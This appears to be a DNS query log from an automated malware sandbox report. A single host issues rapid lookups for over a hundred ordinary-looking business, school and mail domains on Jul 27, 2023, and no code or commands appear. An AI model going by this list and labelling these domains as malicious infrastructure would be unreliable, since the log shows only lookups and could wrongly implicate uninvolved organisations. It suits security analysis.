                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.657597065 CEST192.168.2.48.8.8.80x7868Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.823456049 CEST192.168.2.48.8.8.80xb3f8Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.869745970 CEST192.168.2.48.8.8.80x88cbStandard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.908281088 CEST192.168.2.48.8.8.80x785cStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.016248941 CEST192.168.2.48.8.8.80x5736Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.117116928 CEST192.168.2.48.8.8.80x340fStandard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.255065918 CEST192.168.2.48.8.8.80xb615Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.301553011 CEST192.168.2.48.8.8.80x841aStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.342061043 CEST192.168.2.48.8.8.80x6244Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.368211031 CEST192.168.2.48.8.8.80x326dStandard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.371471882 CEST192.168.2.48.8.8.80x29b0Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.372461081 CEST192.168.2.48.8.8.80x8c02Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.773598909 CEST192.168.2.48.8.8.80x9655Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.774916887 CEST192.168.2.48.8.8.80x4ef4Standard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.774916887 CEST192.168.2.48.8.8.80x69eeStandard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.788064957 CEST192.168.2.48.8.8.80x4315Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.789695978 CEST192.168.2.48.8.8.80xe4a8Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.801740885 CEST192.168.2.48.8.8.80x9021Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.812222004 CEST192.168.2.48.8.8.80x7f31Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.823863029 CEST192.168.2.48.8.8.80x5450Standard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.828391075 CEST192.168.2.48.8.8.80x7722Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.952611923 CEST192.168.2.48.8.8.80x3dfeStandard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:24.085614920 CEST192.168.2.48.8.8.80xca9fStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:24.099224091 CEST192.168.2.48.8.8.80xdf9fStandard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:24.168457985 CEST192.168.2.48.8.8.80x48afStandard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.003736019 CEST192.168.2.48.8.8.80xb615Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.189580917 CEST192.168.2.48.8.8.80x5736Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.248733997 CEST192.168.2.48.8.8.80xa88eStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.310669899 CEST192.168.2.48.8.8.80xea3fStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.412501097 CEST192.168.2.48.8.8.80x1008Standard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.436974049 CEST192.168.2.48.8.8.80xb83Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.444696903 CEST192.168.2.48.8.8.80x1718Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.445396900 CEST192.168.2.48.8.8.80x201cStandard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.489054918 CEST192.168.2.48.8.8.80x8d01Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.660762072 CEST192.168.2.48.8.8.80xb76eStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.682959080 CEST192.168.2.48.8.8.80xe439Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.752950907 CEST192.168.2.48.8.8.80xf26cStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.787075043 CEST192.168.2.48.8.8.80x4ed9Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.960911036 CEST192.168.2.48.8.8.80xe29bStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.020941019 CEST192.168.2.48.8.8.80xb615Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.209052086 CEST192.168.2.48.8.8.80x6c5eStandard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.290888071 CEST192.168.2.48.8.8.80xdcb6Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.400434017 CEST192.168.2.48.8.8.80x5762Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.405708075 CEST192.168.2.48.8.8.80x9238Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.683383942 CEST192.168.2.48.8.8.80x4b51Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.775466919 CEST192.168.2.48.8.8.80xf26cStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.921194077 CEST192.168.2.48.8.8.80x9096Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.924138069 CEST192.168.2.48.8.8.80xd815Standard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.985078096 CEST192.168.2.48.8.8.80x5669Standard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.100132942 CEST192.168.2.48.8.8.80xd5b1Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.218529940 CEST192.168.2.48.8.8.80xc1dcStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.221561909 CEST192.168.2.48.8.8.80x6093Standard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.231045008 CEST192.168.2.48.8.8.80x5925Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.305473089 CEST192.168.2.48.8.8.80x6bbcStandard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.580418110 CEST192.168.2.48.8.8.80xbfdbStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.626279116 CEST192.168.2.48.8.8.80x4cbfStandard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.629072905 CEST192.168.2.48.8.8.80x1e06Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.653156996 CEST192.168.2.48.8.8.80xcbbStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.678004980 CEST192.168.2.48.8.8.80x9822Standard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.770423889 CEST192.168.2.48.8.8.80xf26cStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.994383097 CEST192.168.2.48.8.8.80x1794Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.022459984 CEST192.168.2.48.8.8.80xb615Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.068325043 CEST192.168.2.48.8.8.80x7ffStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.177970886 CEST192.168.2.48.8.8.80xe700Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.292895079 CEST192.168.2.48.8.8.80xfd9cStandard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.302715063 CEST192.168.2.48.8.8.80xd3feStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.333406925 CEST192.168.2.48.8.8.80x54dfStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.357023954 CEST192.168.2.48.8.8.80x4d72Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.414030075 CEST192.168.2.48.8.8.80x8ffeStandard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.420510054 CEST192.168.2.48.8.8.80xfd5aStandard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.428606987 CEST192.168.2.48.8.8.80xa06eStandard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.428606987 CEST192.168.2.48.8.8.80xb864Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.429121971 CEST192.168.2.48.8.8.80x6488Standard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.461647034 CEST192.168.2.48.8.8.80x7727Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.474740982 CEST192.168.2.48.8.8.80x7e4bStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.496035099 CEST192.168.2.48.8.8.80x9e22Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.708106041 CEST192.168.2.48.8.8.80xaaeaStandard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.715857029 CEST192.168.2.48.8.8.80x806cStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.748595953 CEST192.168.2.48.8.8.80xab83Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.783817053 CEST192.168.2.48.8.8.80x637fStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.981617928 CEST192.168.2.48.8.8.80x5bd4Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.092103958 CEST192.168.2.48.8.8.80xbee8Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.139424086 CEST192.168.2.48.8.8.80x26a5Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.178397894 CEST192.168.2.48.8.8.80xb874Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.193645954 CEST192.168.2.48.8.8.80xfdcaStandard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.272273064 CEST192.168.2.48.8.8.80xde8aStandard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.274521112 CEST192.168.2.48.8.8.80x4a7dStandard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.328036070 CEST192.168.2.48.8.8.80x7c98Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.563173056 CEST192.168.2.48.8.8.80x5ad8Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.730781078 CEST192.168.2.48.8.8.80xf1c7Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.833606005 CEST192.168.2.48.8.8.80xf26cStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.850017071 CEST192.168.2.48.8.8.80x83acStandard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.884744883 CEST192.168.2.48.8.8.80xd103Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.013042927 CEST192.168.2.48.8.8.80x6eafStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.013979912 CEST192.168.2.48.8.8.80x13f4Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.031606913 CEST192.168.2.48.8.8.80x6b0bStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.055237055 CEST192.168.2.48.8.8.80xf7b3Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.123990059 CEST192.168.2.48.8.8.80x20c1Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.123990059 CEST192.168.2.48.8.8.80xc7f0Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.237504959 CEST192.168.2.48.8.8.80x62f7Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.259123087 CEST192.168.2.48.8.8.80xc6cfStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.293442011 CEST192.168.2.48.8.8.80x3d22Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.324044943 CEST192.168.2.48.8.8.80xf9edStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.380872965 CEST192.168.2.48.8.8.80x5671Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.412077904 CEST192.168.2.48.8.8.80x502fStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.475678921 CEST192.168.2.48.8.8.80x9b76Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.524859905 CEST192.168.2.48.8.8.80xe53eStandard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.635931015 CEST192.168.2.48.8.8.80x30cStandard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.681339025 CEST192.168.2.48.8.8.80xbab1Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.770596027 CEST192.168.2.48.8.8.80x727Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.993798018 CEST192.168.2.48.8.8.80x928aStandard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.084621906 CEST192.168.2.48.8.8.80xe514Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.142823935 CEST192.168.2.48.8.8.80xcd92Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.393673897 CEST192.168.2.48.8.8.80xbc13Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.397202015 CEST192.168.2.48.8.8.80x29f8Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.397315979 CEST192.168.2.48.8.8.80x6098Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.398010969 CEST192.168.2.48.8.8.80x208eStandard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.398932934 CEST192.168.2.48.8.8.80xba99Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.399774075 CEST192.168.2.48.8.8.80x1127Standard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.399899960 CEST192.168.2.48.8.8.80xd9bcStandard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.400470018 CEST192.168.2.48.8.8.80x7f3Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.401170015 CEST192.168.2.48.8.8.80xff69Standard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.401844025 CEST192.168.2.48.8.8.80x1328Standard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.405430079 CEST192.168.2.48.8.8.80xe2a6Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.405430079 CEST192.168.2.48.8.8.80x84c6Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.406037092 CEST192.168.2.48.8.8.80x38fdStandard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.406817913 CEST192.168.2.48.8.8.80x14f0Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.407383919 CEST192.168.2.48.8.8.80xfad0Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.408075094 CEST192.168.2.48.8.8.80x5b8cStandard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.408075094 CEST192.168.2.48.8.8.80x6342Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.409121990 CEST192.168.2.48.8.8.80x42d4Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.409497023 CEST192.168.2.48.8.8.80x9eeStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.409689903 CEST192.168.2.48.8.8.80x9df5Standard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.441979885 CEST192.168.2.48.8.8.80x36abStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.442049980 CEST192.168.2.48.8.8.80x4b42Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.443116903 CEST192.168.2.48.8.8.80x723eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.443705082 CEST192.168.2.48.8.8.80xb8c8Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.443706036 CEST192.168.2.48.8.8.80x2671Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.445730925 CEST192.168.2.48.8.8.80x2ee9Standard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.446254015 CEST192.168.2.48.8.8.80x911eStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.455550909 CEST192.168.2.48.8.8.80x851bStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.456062078 CEST192.168.2.48.8.8.80x16abStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.465287924 CEST192.168.2.48.8.8.80x1966Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.471940994 CEST192.168.2.48.8.8.80xa154Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.474951029 CEST192.168.2.48.8.8.80xa920Standard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.477448940 CEST192.168.2.48.8.8.80xec52Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.480483055 CEST192.168.2.48.8.8.80x9cb7Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.487701893 CEST192.168.2.48.8.8.80xbf3cStandard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.489552975 CEST192.168.2.48.8.8.80x4fStandard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.489665985 CEST192.168.2.48.8.8.80xe10eStandard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.494291067 CEST192.168.2.48.8.8.80xa483Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.496571064 CEST192.168.2.48.8.8.80xaaafStandard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.500336885 CEST192.168.2.48.8.8.80x3876Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.500921011 CEST192.168.2.48.8.8.80x75e8Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.502346992 CEST192.168.2.48.8.8.80x1ad5Standard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.503798962 CEST192.168.2.48.8.8.80x65d3Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.506206036 CEST192.168.2.48.8.8.80x5d2fStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.507445097 CEST192.168.2.48.8.8.80x5d1bStandard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.509218931 CEST192.168.2.48.8.8.80x70fdStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.509665012 CEST192.168.2.48.8.8.80x4f5dStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.518343925 CEST192.168.2.48.8.8.80x4c86Standard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.519493103 CEST192.168.2.48.8.8.80x7fb4Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.520421982 CEST192.168.2.48.8.8.80xfd63Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.522552967 CEST192.168.2.48.8.8.80x4647Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.526268005 CEST192.168.2.48.8.8.80x43c2Standard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.531071901 CEST192.168.2.48.8.8.80x4b7dStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.531955004 CEST192.168.2.48.8.8.80x3975Standard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.533579111 CEST192.168.2.48.8.8.80xfef5Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.535346985 CEST192.168.2.48.8.8.80x19d4Standard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.540039062 CEST192.168.2.48.8.8.80xa432Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.540787935 CEST192.168.2.48.8.8.80x7f6eStandard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.542778969 CEST192.168.2.48.8.8.80xc4f6Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.546740055 CEST192.168.2.48.8.8.80xad29Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.554600000 CEST192.168.2.48.8.8.80x91beStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.587719917 CEST192.168.2.48.8.8.80x13e0Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.594274044 CEST192.168.2.48.8.8.80x6364Standard query (0)yoruksut.comA (IP address)IN (0x0001)false
